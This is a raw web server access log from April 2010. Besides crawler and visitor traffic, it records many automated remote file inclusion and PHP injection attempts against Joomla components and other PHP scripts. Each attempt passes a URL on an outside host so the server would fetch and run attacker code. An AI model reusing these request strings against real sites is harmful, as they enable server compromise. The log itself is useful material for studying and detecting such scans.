222.236.47.182 - - [20/Apr/2010:04:22:58 -0500] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
162.53.36.90 - - [20/Apr/2010:04:23:08 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 200 808 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
162.53.36.90 - - [20/Apr/2010:04:23:08 -0500] "GET /tattoo/tate4.JPG HTTP/1.1" 200 18555 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
162.53.36.90 - - [20/Apr/2010:04:23:08 -0500] "GET /tattoo/tate2.JPG HTTP/1.1" 200 13891 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
162.53.36.90 - - [20/Apr/2010:04:23:08 -0500] "GET /tattoo/tate3.JPG HTTP/1.1" 200 16409 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)"
222.236.47.182 - - [20/Apr/2010:04:23:08 -0500] "GET /logs/access_log.1219708800/components/com_colorlab/admin.color.php?mosConfig_live_site=http://takesi.freewebhostx.com//fx29id1.txt??? HTTP/1.1" 404 350 "-""Mozilla/5.0"
222.236.47.182 - - [20/Apr/2010:04:23:08 -0500] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://takesi.freewebhostx.com//fx29id1.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
87.250.255.243 - - [20/Apr/2010:04:23:57 -0500] "GET /logs/access_log.1240012800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.12.207 - - [20/Apr/2010:04:27:11 -0500] "GET /logs/?M=A HTTP/1.1" 200 2456 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
87.250.255.243 - - [20/Apr/2010:04:28:36 -0500] "GET /logs/access_log.1236988800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
222.236.47.182 - - [20/Apr/2010:04:29:52 -0500] "GET /logs/access_log.1219708800/components/com_colorlab/admin.color.php?mosConfig_live_site=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
222.236.47.182 - - [20/Apr/2010:04:31:10 -0500] "GET /logs/access_log.1219708800%20%20/components/com_colorlab/admin.color.php?mosConfig_live_site=http://takesi.freewebhostx.com//fx29id1.txt??? HTTP/1.1" 404 352 "-""Mozilla/5.0"
99.198.106.194 - - [20/Apr/2010:04:31:30 -0500] "GET /errors.php?error=http://plan.kistep.re.kr//pds_data/committee_member/baner.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
99.198.106.194 - - [20/Apr/2010:04:31:30 -0500] "GET /logs/errors.php?error=http://plan.kistep.re.kr//pds_data/committee_member/baner.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
99.198.106.194 - - [20/Apr/2010:04:31:30 -0500] "GET /logs/access_log.1219363200%20%20/errors.php?error=http://plan.kistep.re.kr//pds_data/committee_member/baner.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
212.227.141.53 - - [20/Apr/2010:04:33:58 -0500] "GET //components/errors.php?error=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
212.227.141.53 - - [20/Apr/2010:04:33:58 -0500] "GET /logs//components/errors.php?error=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
212.227.141.53 - - [20/Apr/2010:04:33:58 -0500] "GET /logs/access_log.1268265600//components/errors.php?error=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
87.250.255.243 - - [20/Apr/2010:04:34:11 -0500] "GET /logs/access_log.1252281600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.199.179 - - [20/Apr/2010:04:36:15 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.204.243 - - [20/Apr/2010:04:37:59 -0500] "GET /logs/access_log.1215993600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
222.236.47.182 - - [20/Apr/2010:04:39:12 -0500] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://takesi.freewebhostx.com//fx29id1.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
222.236.47.182 - - [20/Apr/2010:04:39:12 -0500] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://takesi.freewebhostx.com//fx29id1.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
222.236.47.182 - - [20/Apr/2010:04:39:14 -0500] "GET /logs/access_log.1219708800%20%20/components/com_colorlab/admin.color.php?mosConfig_live_site=http://takesi.freewebhostx.com//fx29id1.txt??? HTTP/1.1" 404 352 "-""Mozilla/5.0"
99.198.106.194 - - [20/Apr/2010:04:40:01 -0500] "GET /logs/access_log.1219363200/errors.php?error=http://plan.kistep.re.kr//pds_data/committee_member/baner.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
88.191.94.188 - - [20/Apr/2010:04:41:13 -0500] "GET /////administrator/components/com_rwcards/admin.rwcards.about.html.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 353 "-""Mozilla/5.0"
88.191.94.188 - - [20/Apr/2010:04:41:13 -0500] "GET /logs/////administrator/components/com_rwcards/admin.rwcards.about.html.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 358 "-""Mozilla/5.0"
88.191.94.188 - - [20/Apr/2010:04:41:13 -0500] "GET /logs/access_log.1268611200/////administrator/components/com_rwcards/admin.rwcards.about.html.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 380 "-""Mozilla/5.0"
88.191.94.188 - - [20/Apr/2010:04:41:16 -0500] "GET /logs/access_log.1219363200/////administrator/components/com_rwcards/admin.rwcards.about.html.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 380 "-""Mozilla/5.0"
87.250.255.243 - - [20/Apr/2010:04:41:35 -0500] "GET /logs/access_log.1237680000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
88.191.94.188 - - [20/Apr/2010:04:41:35 -0500] "GET /logs/////administrator/components/com_rwcards/admin.rwcards.about.html.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 358 "-""Mozilla/5.0"
88.191.94.188 - - [20/Apr/2010:04:41:35 -0500] "GET /////administrator/components/com_rwcards/admin.rwcards.about.html.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 353 "-""Mozilla/5.0"
88.191.94.188 - - [20/Apr/2010:04:41:35 -0500] "GET /logs/access_log.1268611200/////administrator/components/com_rwcards/admin.rwcards.about.html.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 380 "-""Mozilla/5.0"
88.191.94.188 - - [20/Apr/2010:04:41:38 -0500] "GET /logs/access_log.1219363200/////administrator/components/com_rwcards/admin.rwcards.about.html.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 380 "-""Mozilla/5.0"
121.78.118.123 - - [20/Apr/2010:04:42:55 -0500] "GET /logs/access_log.1262476800//bbs//skin/ggambo7002_board/write.php?dir=http://www.nationalmedecine.com/forum/autoid.txt??? HTTP/1.1" 404 348 "-""Mozilla/5.0"
121.78.118.123 - - [20/Apr/2010:04:42:55 -0500] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://www.nationalmedecine.com/forum/autoid.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
121.78.118.123 - - [20/Apr/2010:04:43:00 -0500] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://www.nationalmedecine.com/forum/autoid.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
67.222.152.66 - - [20/Apr/2010:04:43:19 -0500] "GET //SSI.php?sourcedir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
67.222.152.66 - - [20/Apr/2010:04:43:19 -0500] "GET /logs/access_log.1268956800%20%20//SSI.php?sourcedir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
67.222.152.66 - - [20/Apr/2010:04:43:19 -0500] "GET /logs//SSI.php?sourcedir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
121.78.118.123 - - [20/Apr/2010:04:43:45 -0500] "GET /logs/access_log.1262476800//bbs//skin/ggambo7002_board/write.php?dir=http://www.nationalmedecine.com/forum/autoid.txt??? HTTP/1.1" 404 348 "-""Mozilla/5.0"
121.78.118.123 - - [20/Apr/2010:04:43:45 -0500] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://www.nationalmedecine.com/forum/autoid.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
121.78.118.123 - - [20/Apr/2010:04:43:45 -0500] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://www.nationalmedecine.com/forum/autoid.txt??? HTTP/1.1" 404 321 "-""Mozilla/5.0"
207.46.13.45 - - [20/Apr/2010:04:44:00 -0500] "GET /logs/access_log.1248652800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.222.152.66 - - [20/Apr/2010:04:44:46 -0500] "GET //SSI.php?sourcedir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
67.222.152.66 - - [20/Apr/2010:04:44:46 -0500] "GET /logs//SSI.php?sourcedir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
67.222.152.66 - - [20/Apr/2010:04:44:46 -0500] "GET /logs/access_log.1268956800%20%20//SSI.php?sourcedir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
67.222.152.66 - - [20/Apr/2010:04:44:57 -0500] "GET //SSI.php?sourcedir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
67.222.152.66 - - [20/Apr/2010:04:44:57 -0500] "GET /logs//SSI.php?sourcedir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
67.222.152.66 - - [20/Apr/2010:04:44:57 -0500] "GET /logs/access_log.1268956800%20%20//SSI.php?sourcedir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
110.45.147.226 - - [20/Apr/2010:04:45:28 -0500] "GET /logs/write.php?dir=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
110.45.147.226 - - [20/Apr/2010:04:45:28 -0500] "GET /logs/access_log.1220054400%20%20/write.php?dir=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
110.45.147.226 - - [20/Apr/2010:04:45:28 -0500] "GET /write.php?dir=http://womancamp.co.kr/img/zero1.jpg??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
222.236.47.182 - - [20/Apr/2010:04:45:33 -0500] "GET /logs/access_log.1219708800/components/com_colorlab/admin.color.php?mosConfig_live_site=http://takesi.freewebhostx.com//fx29id1.txt??? HTTP/1.1" 404 350 "-""Mozilla/5.0"
87.250.255.243 - - [20/Apr/2010:04:46:12 -0500] "GET /logs/access_log.1251072000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [20/Apr/2010:04:52:36 -0500] "GET /logs/access_log.1162080000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [20/Apr/2010:04:56:21 -0500] "GET /logs/access_log.1252800000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [20/Apr/2010:05:01:00 -0500] "GET /logs/access_log.1187481600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.199.54 - - [20/Apr/2010:05:06:00 -0500] "GET /logs/access_log.1216598400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [20/Apr/2010:05:07:31 -0500] "GET /logs/access_log.1232496000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
125.251.103.3 - - [20/Apr/2010:05:10:40 -0500] "GET /logs//popup_window.php?site_isp_root=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 306 "-""Mozilla/5.0"
125.251.103.3 - - [20/Apr/2010:05:10:40 -0500] "GET //popup_window.php?site_isp_root=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 301 "-""Mozilla/5.0"
125.251.103.3 - - [20/Apr/2010:05:10:40 -0500] "GET /logs/access_log.1220054400//popup_window.php?site_isp_root=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
125.251.103.3 - - [20/Apr/2010:05:11:06 -0500] "GET //popup_window.php?site_isp_root=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 301 "-""Mozilla/5.0"
125.251.103.3 - - [20/Apr/2010:05:11:06 -0500] "GET /logs//popup_window.php?site_isp_root=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 306 "-""Mozilla/5.0"
125.251.103.3 - - [20/Apr/2010:05:11:06 -0500] "GET /logs/access_log.1220054400//popup_window.php?site_isp_root=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
87.250.255.243 - - [20/Apr/2010:05:12:09 -0500] "GET /logs/access_log.1242777600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
67.195.112.180 - - [20/Apr/2010:05:14:49 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.250.255.243 - - [20/Apr/2010:05:17:42 -0500] "GET /logs/access_log.1253664000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
67.195.112.180 - - [20/Apr/2010:05:18:29 -0500] "GET /?D=A HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
79.98.23.9 - - [20/Apr/2010:05:24:25 -0500] "GET /logs/access_log.1264723200////?_SERVER[DOCUMENT_ROOT]=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
79.98.23.9 - - [20/Apr/2010:05:24:25 -0500] "GET ////?_SERVER[DOCUMENT_ROOT]=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 200 1005 "-""Mozilla/5.0"
79.98.23.9 - - [20/Apr/2010:05:24:25 -0500] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 200 2463 "-""Mozilla/5.0"
87.250.255.243 - - [20/Apr/2010:05:25:07 -0500] "GET /logs/access_log.1189123200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.13.142 - - [20/Apr/2010:05:28:00 -0500] "GET /logs/access_log.1222905600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [20/Apr/2010:05:29:46 -0500] "GET /logs/access_log.1200787200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
180.210.205.21 - - [20/Apr/2010:05:30:32 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://jack.tiscali.it/hitech/fotocamere/.bash/id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
180.210.205.21 - - [20/Apr/2010:05:30:32 -0500] "GET /logs/access_log.1266278400//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://jack.tiscali.it/hitech/fotocamere/.bash/id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
180.210.205.21 - - [20/Apr/2010:05:30:32 -0500] "GET /logs/access_log.1265673600//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://jack.tiscali.it/hitech/fotocamere/.bash/id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
180.210.205.21 - - [20/Apr/2010:05:30:32 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://jack.tiscali.it/hitech/fotocamere/.bash/id1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
207.46.195.233 - - [20/Apr/2010:05:31:59 -0500] "GET /logs/access_log.1264636800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [20/Apr/2010:05:32:07 -0500] "GET /logs/access_log.1189987200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
212.227.141.53 - - [20/Apr/2010:05:35:34 -0500] "GET /logs/access_log.1219708800%20%20/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
212.227.141.53 - - [20/Apr/2010:05:35:34 -0500] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
212.227.141.53 - - [20/Apr/2010:05:35:34 -0500] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
212.227.141.53 - - [20/Apr/2010:05:36:24 -0500] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
212.227.141.53 - - [20/Apr/2010:05:36:24 -0500] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
212.227.141.53 - - [20/Apr/2010:05:36:24 -0500] "GET /logs/access_log.1219708800%20%20/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
87.250.255.243 - - [20/Apr/2010:05:36:51 -0500] "GET /logs/access_log.1271548800 HTTP/1.1" 200 576917 "-""Yandex/1.01.001 (compatible; Win16; I)"
212.227.141.53 - - [20/Apr/2010:05:39:05 -0500] "GET /logs/access_log.1219708800/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
212.227.141.53 - - [20/Apr/2010:05:39:33 -0500] "GET /logs/access_log.1212969600/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
87.250.255.243 - - [20/Apr/2010:05:40:35 -0500] "GET /logs/access_log.1199404800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
212.227.141.53 - - [20/Apr/2010:05:40:36 -0500] "GET /logs/access_log.1219708800/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
212.227.141.53 - - [20/Apr/2010:05:40:55 -0500] "GET /logs/access_log.1212969600/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
67.195.112.180 - - [20/Apr/2010:05:42:17 -0500] "GET /logs/access_log.1252368000 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.46.157.102 - - [20/Apr/2010:05:43:43 -0500] "GET /logs/?INCLUDE_FOLDER=http://www.thaianglican.org/song_doc/a.jpg?? HTTP/1.1" 200 2456 "-""Mozilla/5.0"
72.46.157.102 - - [20/Apr/2010:05:43:43 -0500] "GET /?INCLUDE_FOLDER=http://www.thaianglican.org/song_doc/a.jpg?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
72.46.157.102 - - [20/Apr/2010:05:43:43 -0500] "GET /logs/access_log.1265760000/?INCLUDE_FOLDER=http://www.thaianglican.org/song_doc/a.jpg?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
72.46.157.102 - - [20/Apr/2010:05:43:48 -0500] "GET /logs/access_log.1262822400/?INCLUDE_FOLDER=http://www.thaianglican.org/song_doc/a.jpg?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
87.250.255.243 - - [20/Apr/2010:05:47:10 -0500] "GET /logs/access_log.1228262400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
72.46.157.102 - - [20/Apr/2010:05:49:47 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.thaianglican.org/song_doc/a.jpg?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
72.46.157.102 - - [20/Apr/2010:05:49:48 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.thaianglican.org/song_doc/a.jpg?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
72.46.157.102 - - [20/Apr/2010:05:49:48 -0500] "GET /logs/access_log.1219708800//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.thaianglican.org/song_doc/a.jpg?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
211.174.185.131 - - [20/Apr/2010:05:51:07 -0500] "GET //view.php?view[use_category]=1&dir=http://come.kr/calendar315/plan/zfxid1.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
211.174.185.131 - - [20/Apr/2010:05:51:07 -0500] "GET /logs/access_log.1262476800//view.php?view[use_category]=1&dir=http://come.kr/calendar315/plan/zfxid1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.174.185.131 - - [20/Apr/2010:05:51:07 -0500] "GET /logs//view.php?view[use_category]=1&dir=http://come.kr/calendar315/plan/zfxid1.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
211.174.185.131 - - [20/Apr/2010:05:51:53 -0500] "GET //view.php?view[use_category]=1&dir=http://come.kr/calendar315/plan/zfxid1.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
211.174.185.131 - - [20/Apr/2010:05:51:53 -0500] "GET /logs/access_log.1262476800//view.php?view[use_category]=1&dir=http://come.kr/calendar315/plan/zfxid1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.174.185.131 - - [20/Apr/2010:05:51:53 -0500] "GET /logs//view.php?view[use_category]=1&dir=http://come.kr/calendar315/plan/zfxid1.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
87.250.255.243 - - [20/Apr/2010:05:52:46 -0500] "GET /logs/access_log.1221436800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
211.174.185.131 - - [20/Apr/2010:05:53:30 -0500] "GET /logs/access_log.1265414400//view.php?view[use_category]=1&dir=http://come.kr/calendar315/plan/zfxid1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.174.185.131 - - [20/Apr/2010:05:54:15 -0500] "GET /logs/access_log.1265414400//view.php?view[use_category]=1&dir=http://come.kr/calendar315/plan/zfxid1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
87.250.255.243 - - [20/Apr/2010:05:58:22 -0500] "GET /logs/access_log.1226448000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
87.250.255.243 - - [20/Apr/2010:06:05:50 -0500] "GET /logs/access_log.1230163200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
208.115.111.248 - - [20/Apr/2010:06:10:21 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
87.250.255.243 - - [20/Apr/2010:06:11:25 -0500] "GET /logs/access_log.1165276800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.195.226 - - [20/Apr/2010:06:13:01 -0500] "GET /logs/access_log.1260403200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
75.127.70.39 - - [20/Apr/2010:06:14:14 -0500] "GET /logs/access_log.1220054400//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p%20ath=http://bdbd.interfree.it/FxID1.txt?? HTTP/1.1" 404 378 "-""Mozilla/5.0"
75.127.70.39 - - [20/Apr/2010:06:14:14 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p%20ath=http://bdbd.interfree.it/FxID1.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0"
75.127.70.39 - - [20/Apr/2010:06:14:14 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p%20ath=http://bdbd.interfree.it/FxID1.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
207.46.199.44 - - [20/Apr/2010:06:16:00 -0500] "GET /logs/access_log.1262649600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [20/Apr/2010:06:16:20 -0500] "GET /logs/access_log.1171238400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
84.20.28.118 - - [20/Apr/2010:06:18:41 -0500] "GET //adminhead.php?path[docroot]=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 298 "-""Mozilla/5.0"
84.20.28.118 - - [20/Apr/2010:06:18:41 -0500] "GET /logs//adminhead.php?path[docroot]=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 303 "-""Mozilla/5.0"
84.20.28.118 - - [20/Apr/2010:06:18:41 -0500] "GET /logs/access_log.1270598400//adminhead.php?path[docroot]=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 325 "-""Mozilla/5.0"
84.20.28.118 - - [20/Apr/2010:06:18:46 -0500] "GET //adminhead.php?path[docroot]=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 298 "-""Mozilla/5.0"
84.20.28.118 - - [20/Apr/2010:06:18:46 -0500] "GET /logs/access_log.1270598400%20%20//adminhead.php?path[docroot]=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 327 "-""Mozilla/5.0"
84.20.28.118 - - [20/Apr/2010:06:18:46 -0500] "GET /logs//adminhead.php?path[docroot]=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 303 "-""Mozilla/5.0"
84.20.28.118 - - [20/Apr/2010:06:18:49 -0500] "GET //adminhead.php?path[docroot]=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 298 "-""Mozilla/5.0"
84.20.28.118 - - [20/Apr/2010:06:18:49 -0500] "GET /logs/access_log.1265414400//adminhead.php?path[docroot]=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 325 "-""Mozilla/5.0"
84.20.28.118 - - [20/Apr/2010:06:18:49 -0500] "GET /logs//adminhead.php?path[docroot]=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 303 "-""Mozilla/5.0"
84.20.28.118 - - [20/Apr/2010:06:18:55 -0500] "GET /logs/access_log.1225238400//adminhead.php?path[docroot]=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 325 "-""Mozilla/5.0"
84.20.28.118 - - [20/Apr/2010:06:19:01 -0500] "GET //adminhead.php?path[docroot]=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 298 "-""Mozilla/5.0"
84.20.28.118 - - [20/Apr/2010:06:19:01 -0500] "GET /logs/access_log.1270598400%20%20//adminhead.php?path[docroot]=http://www.sly8.com/sly8//adm/id/ver1? HTTP/1.1" 404 327 "-""Mozilla/5.0"
